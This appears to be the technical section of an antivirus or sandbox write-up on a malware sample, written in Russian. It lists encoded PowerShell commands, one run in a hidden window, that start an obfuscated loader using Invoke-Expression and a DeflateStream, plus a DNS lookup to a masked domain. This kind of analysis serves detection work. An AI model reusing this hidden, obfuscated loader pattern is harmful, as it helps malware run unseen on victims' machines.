Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABpAEUAWAAgACgAIABOAEUAdwAtAE8AQgBqAGUAYwB0ACAAUwB5AFMAVABlAE0ALgBJAG8ALgBjAE8AbQBwAHIARQBzAFMASQBvAE4ALgBkAEUAZgBMAEEAVABlAFMAdAByAGUAYQBtACgAWwBTAHkAUwBUAGUAbQAuAGkATwAuAE0ARQBNAE8AcgBZAH...
- DNS ASK km###dhwe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABpAEUAWAAgACgAIABOAEUAdwAtAE8AQgBqAGUAYwB0ACAAUwB5AFMAVABlAE0ALgBJAG8ALgBjAE8AbQBwAHIARQBzAFMASQBvAE4ALgBkAEUAZgBMAEEAVABlAFMAdAByAGUAYQBtACgAWwBTAHkAUwBUAGUAbQAuAGkATwAuAE0ARQBNAE8AcgBZAH...' (со скрытым окном)